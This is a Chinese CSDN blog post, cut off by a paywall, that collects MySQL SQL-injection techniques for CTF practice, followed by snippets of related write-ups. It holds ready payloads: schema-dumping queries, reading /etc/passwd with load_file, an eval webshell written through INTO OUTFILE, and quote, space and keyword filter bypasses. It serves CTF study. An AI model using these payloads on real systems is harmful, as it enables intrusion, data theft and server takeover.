mysql注入ctf_CTF考点总结-sql注入

最新推荐文章于 2022-11-13 22:52:51 发布
最新推荐文章于 2022-11-13 22:52:51 发布
阅读量1.1k 收藏 6
点赞数 1
文章标签: mysql注入ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36488760/article/details/113460519
版权
本文详述了SQL注入的相关知识,特别是针对MySQL的CTF挑战中的常见技巧。内容包括利用information_schema获取数据库信息、SQL函数应用、绕过方法、注入分类以及各种报错注入的实现方式,如order by、desc、asc、大整数溢出等。此外,还介绍了如何利用日志写入webshell和UDF提权等高级技巧。
摘要由CSDN通过智能技术生成

整理下sql相关知识,查漏补缺(长期更新)

常用语句及知识

information_schema包含了大量有用的信息,例如下图

2c661dadf52d8b4afcbc2972c37b30fa.png

mysql.user下有所有的用户信息,其中authentication_string为用户密码的hash,如果可以使用可以修改这个值,那么就可以修改任意用户的密码

当前用户:select user()

数据库版本:select version() , select @@version

数据库名:select database()

操作系统:select @@version_compile_os

所有变量:show variables

单个变量:select @@secure_file_priv , show variables like 'secure_file_%'

爆字段数:order by 1... ,group by 1...

查库名:select group_concat(schema_name) from information_schema.schemata

查表名:select group_concat(table_name) from information_schema.tables where table_schema='库名'

查字段:select group_concat(column_name) from information_schema.columns where table_name='表名'

读取某行:select * from mysql.user limit n,m // limit m offset n (第n行之后m行,第一行为0)

读文件:select load_file('/etc/passwd')

写文件:select '<?php @eval($_POST[a]);?>' into outfile '/var/www/html/a.php' //该处文件名无法使用16进制绕过

常用函数

截取字符串:substr('abc',1,1)、substring('abc',1,1)、left('abc',1)、right('abc',1),mid('abc',1,1)

字符串拼接:concat('a','b','c'),concat_ws(' ','a','b','c')

多行拼接:group_concat //eg: select group_concat(user) from mysql.user

时延函数:sleep(5)、benchmark(10000000,md5('123456')) //其他方法get_lock(),笛卡尔,rlike等

编码函数: hex、ord、ascii、char、conv(255,10,16)=FF(2-36进制转换)

布尔条件:if(1,1,0)、position('a' in 'abc')、elt(1,'a','b')=a&&elt(2,'a','b')=b、(case when (bool) then 1 else 0 end)、field('a',3,2,'a')=3、nullif('a','b')=1&&nullif('a','a')=null、strcmp、regexp、rlike、regexp_like('1','1')...

绕过方法

绕过空格

%20、%09、%0a、%0b、%0c、%0d、%a0、%00、/**/、 /*!select*/ 、()、--%0a(可以1-256都跑一遍)

其中%09需要php环境,%0a为\n

/!select/为mysql独有。常见用法为/!50727select 1/,即当版本号小于等于50727时,执行select 1

8a50e99e090eabc49f3dda28c220fba3.png

绕过单引号

\转义、宽字节%df%27,%bf%27、十六进制绕过

注释方法

/**/、--+、#、;%00、union /*!select*/(mysql独有)

select from union select绕过

select-1,user from mysql.user

select@1,user from mysql.user

select~1,user from mysql.user

select`user`,user from mysql.user

select(1),user from mysql.user

select'1',user from mysql.user

select+1,user from mysql.user

select 1,1e2from mysql.user

select 1,.9from mysql.user

select 1``from mysql.user

select 1''from mysql.user

select 1'123'from mysql.user

select '1'''from mysql.user

select 1""from mysql.user

select "1"""from mysql.user

select 1

最低0.47元/天 解锁文章
麦三姆
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
[网络安全自学篇] 四.实验吧CTF实战之WEB渗透和隐写术解密
杨秀璋的专栏
08-06 1万+
上一篇文章分享了解BurpSuite工具的安装配置、Proxy基础用法,并分享一个简单的暴库案例;本篇文章分享实验吧CFT实战的题目,涉及WEB渗透和隐写术常见题型,包括“这是什么”、“天网管理系统”、“忘记密码”、“false”、“天下武功唯快不破”和“隐写术之水果、小苹果”。非常有意思的文章,作为在线笔记,希望对入门的博友们有帮助,大神请飘过,谢谢各位看官!
mysql注入ctf_CTF SQL注入
weixin_42510026的博客
01-28 663
一、宽字节注入原理:GBK编码、URL转码利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围)例如:' -> ' -> %5C%27%df' -> %df' -> %df%5C%27sql字符集特性MYSQL 中 utf8_unicode_ci 和 utf8_general...
CTF mysql
艺博东的博客
10-05 1万+
难度系数: ★★★★★ 题目来源: XCTF 题目描述: 我们在Mysql数据库中存放了flag,但是黑客已经把它删除了。你能找回来flag吗? 题目场景: 暂无 题目附件: 附件1 1、附件1 链接:https://pan.baidu.com/s/12RPRNl7PPgNBLpLatI68Fw 提取码:q57k 2、文件 3、把文件拷贝到 kail Linux 环境 4、点击空白处,鼠标右键—>在这里打开终端 5、strings:在对象文件或二进制文件中查找可打印的字符串。 用法:strin
CTF--MySQL数据库
woshisz0413的博客
11-27 1047
MySQL: (1)MySQL查询:union(连接多个select)
mysql is fashion ctf_一道CTF题引发的思考-MySQL的几个特性
weixin_39645019的博客
01-20 139
0x01 背景前天在做一道CTF题目时一道盲注题,其实盲注也有可能可以回显数据的,如使用DNS或者HTTP等日志来快速的获取数据,MYSQL可以利用LOAD_FILE()函数读取数据,并向远程DNS主机发送数据信息,此时DNS日志文件中就会有盲注语句的查询结果。这里不做这部分的讨论,只是说下有这种方法,在这道题目中我是使用常规的盲注的方式获取数据的。其中遇到有以下几个问题:过滤规则的判断与绕过...
CG CTF WEB MYSQL
无限迭代中......
07-02 484
http://chinalover.sinaapp.com/web11/ 题解: 题目提示robots.txt,首先访问http://chinalover.sinaapp.com/web11/robots.txt, 发现如下代码: 别太开心,flag不在这,这个文件的用途你看完了? 在CTF比赛中,这个文件往往存放着提示信息 TIP:sql.php <?php if($_GET[...
ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4428
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
CTF平台题库writeup(一)--南邮CTF-WEB(部分)
热门推荐
渗透、攻防、CTF、编程
06-25 1万+
WEB题 1.签到题 题目:key在哪里? writeup:查看源代码即可获得flag! 2.md5 collision 题目: <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else {
SQL注入类型CTF题目总结
Lelouch_E的博客
11-25 1546
SQL注入类型CTF题union 注入buu Fakebookbuu Baby Sqli盲注buu Hack World报错注入buu hardsql其他buu BlackList union 注入 buu Fakebook 注册后扫描目录发现:/robots.txt 测试发现/view.php?no=1 参数存在SQL注入,但是union select被waf拦截了 尝试绕过 爆表名 /view.php?no=-1 union/**/select 1,group_concat(table_name),
CTFHub | MySQL结构
最新发布
尼泊罗河伯的博客
11-13 1856
根据网页显示内容输入1进行测试,此题可能存在 SQL 注入。此题与前一题类似,这次使用手工注入。先判断是否存在注入,发现存在注入后检查注入点。判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看全部数据库名,并查看这些数据库的表名,最后在lvlbiqemvj 表中的数据发现此题 flag 。
胖哈勃 web--NewSql Mysql 8 注入
Je3Z的博客
07-14 429
是个Mysql8 特性,就是之前省赛那个,但是那个没复现到,就把这个当复现了吧。 过滤的东西,这个我没记,借鉴其他师傅的 空格 select union|and && updatexml extractvalue group|concat have sleep database insert|join where substr char mid > = || like regexp \ if exp 题目地址http://47.99.38.177:10084/ TABLE ta
CTF web总结--利用mysql日志getshell
bob的博客
08-30 3851
在common.php中发现执行sql语句用的多语句执行,所以可以利用多语句执行来getshell. 代码:function my_mysql_query($sql){ global $conn; if($conn->multi_query($sql)){ // do { if ($result = $conn ->store_result()) {
mysql注入ctf_CTF比赛中SQL注入的一些经验总结
weixin_32334681的博客
01-20 738
*本文原创作者:pupiles,本文属FreeBuf原创奖励计划,未经许可禁止转载ctfsql注入下的一些小技巧最近花了一点时间总结了各大平台中注入的trick,自己还是太菜了,多半都得看题解,就特此做了一个paper方便总结注释符以下是Mysql中可以用到的单行注释符:#-- -;%00以下是Mysql中可以用到的多行注释符(mysql下需要闭合):/*`判断当前库是否有字段名对于CTF中的题...
Pwnhub2021七月赛NewSql(mysql8注入
feng的博客
07-14 1696
Pwnhub2021七月赛NewSql(mysql8注入) 前言 以前虽然知道mysql8的sql注入,但是没有真正的去了解过,正好昨天晚上知道了pwnhub最近的比赛里出了这道题,就顺便复现,学习一下mysql8的SQL注入新特性。 学习文章 MYSQL8.0注入新特性 通过这篇文章学习一下基础的知识。 基础知识补充 文章中使用了information_schema.SCHEMA等来得到数据库,然后得到数据表,但实际上有这么个数据表information_schema.TABLESPACES_EXTEN
mysql注入ctf_Web安全原理剖析-SQL Injection
weixin_30069113的博客
02-02 1323
0x01 预备知识Mysql的相关知识在MySQL 5.0之后,MySQL默认在数据库中存放一个”information_schema”的库,比较重要的三个表名:SCHEMATA、TABLES以及COLUMNS。information_schema.schemata:存储了所有库名。struct该表中记录库名的字段为:SCHEMA_NAME,因此可以如下注入:-1' union select 1,...
mysql注入ctf_BUUCTF[归纳]sql注入相关题目
weixin_42322347的博客
02-02 1594
这是我自己对于sql注入的部分ctf题型的归纳,均来自buuctf的平台环境。[0CTF 2016]piapiapia我尝试了几种payload,发现有两种情况。第一种:Invalid user name第二种:Invalid user name or password第一步想到的是盲注或者报错,因为fuzz一波有一些是没有过滤掉的。对于后台的拦截我想到的可能是黑名单或者是正则表达式匹配。先不管,...
mysql手工注入imformation_从一个ctf简单总结mysql手工注入
weixin_42118056的博客
01-19 184
文章最后更新时间为:2019年04月03日 15:26:470x01 先拿flag有个很不错的ctf平台jarvisoj,上面收录了一些经典的ctf题目。今天做了一个web题,借此记录一下sql手工注入的语句。hint:先找到源码再说吧~~...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值